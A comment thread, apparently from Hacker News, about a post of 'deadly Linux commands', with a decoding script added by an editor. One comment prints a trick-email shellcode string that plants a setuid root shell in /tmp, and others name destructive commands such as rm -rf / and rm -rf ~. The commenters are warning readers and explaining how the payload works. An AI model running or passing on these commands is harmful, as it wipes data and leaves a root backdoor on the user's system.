
The Deadly Linux Commands - NARKOZ
https://plus.google.com/111560558537332305125/posts/d64bp6rkZMC
======
simias
And we could come up with a million other different ways to wreck a un*x
system. The only rule is not to run a command you don't understand, especially
if it comes from an untrusted source.

Also, most of those commands won't hurt much if they're not run as root
(except the forkbomb and the recursive chmod/rm, and rm won't let you do that
by default). If you run untrusted commands as root you deserve what happens to
you.

~~~
hobin
^That.

A simple rule of thumb is: don't run any commands you don't understand before
looking up a few descriptions of what it means (or use man pages).

Number 2, for example, is just a bunch of shellcode, and unless you do
penetration testing for a living, you probably can't directly see what it'd
do. This goes not only for this particular script, but for mostly every piece
of shellcode that can be written. (And make no mistake, there are a frapillion
ways in which a piece of shellcode can utterly destroy your computer.) Ergo:
don't run them if you don't get them.

------
philh

        char esp[] __attribute__ ((section(".text"))) /* e.s.p release */
        = "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
        "\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
        "\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
        "\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
        "\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
        "\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
        "\x6e\x2f\x73\x68\x00\x2d\x63\x00"
        "cp -p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;";

Can anyone explain this one? I would have guessed that it's causing an exec
(or something equivalent) with argv "/bin/sh", "-c", "cp -p /bin/sh...".
That's malicious if run as root ('4' in 4755 is setuid, so it basically hides
a root shell in /tmp), but it's not 'rm -rf /'. I could believe that the post
is wrong, but I'd still like to know how this works.

What I've gathered:

1. The final bytes of hex there are "/bin/sh\0-c\0", which is where I'm
getting the argv from. The exec is mostly a guess, because I can't think what
else it would be doing. The previous hex bytes are non-text, possibly
precompiled executable code.

2. The '__attribute__ ((section(".text")))' is a gcc extension that causes this
string not to be stored where it usually would be in the binary. I believe the
.data section would be more normal? But I've never been very clear on what the
different sections are for.

~~~
hkolk
The post is wrong. This does nothing since it is a line of C code, so not
actually executable.

It comes from this trick-email:
<http://seclists.org/fulldisclosure/2007/Aug/71>

There are some details on these commands (and looks like the source article)
here: <http://ubuntuforums.org/announcement.php?f=48> (3rd post)
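
The string extraction philh did by hand, done programmatically as an added example (not code from the thread or the linked posts): it joins the C literal's pieces, decodes the \x escapes to bytes, and lists the printable runs the way strings(1) would, plus the NUL-separated view that yields the argv he guessed. It only reads the bytes; the constant and helper names are mine.

```python
import re

# Copy of the C string literal from the post (the only input; it is parsed as text, never compiled).
ESP_LITERAL = r'''
"\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;"
'''

_SIMPLE_ESCAPES = {'n': 10, 't': 9, 'r': 13, '0': 0, '\\': 92, '"': 34}

def c_literal_to_bytes(literal: str) -> bytes:
    """Concatenate adjacent "..." pieces as the C compiler does and decode the escapes."""
    out = bytearray()
    for piece in re.findall(r'"((?:[^"\\]|\\.)*)"', literal):
        i = 0
        while i < len(piece):
            ch = piece[i]
            if ch != '\\':
                out.append(ord(ch)); i += 1
            elif piece[i + 1] == 'x':            # \xHH (this blob only uses two-digit forms)
                out.append(int(piece[i + 2:i + 4], 16)); i += 4
            else:                                # \n, \0, \\, \" ...
                out.append(_SIMPLE_ESCAPES[piece[i + 1]]); i += 2
    return bytes(out)

def printable_runs(blob: bytes, min_len: int = 4) -> list[str]:
    """What strings(1) reports: runs of printable ASCII at least min_len bytes long."""
    return [m.group().decode() for m in re.finditer(rb'[\x20-\x7e]{%d,}' % min_len, blob)]

def nul_terminated_strings(blob: bytes) -> list[str]:
    """Trailing printable run of each NUL-separated chunk: the C-string view of the blob."""
    found = []
    for chunk in blob.split(b'\x00'):
        tail = re.search(rb'[\x20-\x7e]+$', chunk)
        if tail:
            found.append(tail.group().decode())
    return found

if __name__ == "__main__":
    blob = c_literal_to_bytes(ESP_LITERAL)
    print(len(blob), "bytes;", printable_runs(blob), nul_terminated_strings(blob))
```

The NUL-separated view gives exactly "/bin/sh", "-c", "cp -p ..."; the bytes before "/bin/sh" contain no readable text, which is consistent with philh's guess that they are machine code rather than data.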

------
morsch
FWIW, and _please_ do not rely on this or test it, but _rm -rf /_ should not
do anything on most Linux installs since _--preserve-root_ is the default.

------
nzmsv
Not my proudest moment: once I set up a chroot with several directories using
"mount --bind". Then I didn't need it anymore, so I promptly issued an "rm -rf
*".

------
alpb
Pardon me but I'm impressed as a noob Linux user. 12 commands listed. 6 of
them are rm -rf jokes, 6 of them are /dev/sda jokes. I'd expect different cool
stuff.

------
16s
Most of those must be executed as root to cause harm.

~~~
VMG
which doesn't mean that running a command as a user is less dangerous - in fact
I think that _rm -rf ~_ is more damaging to a normal user than _rm -rf /_.

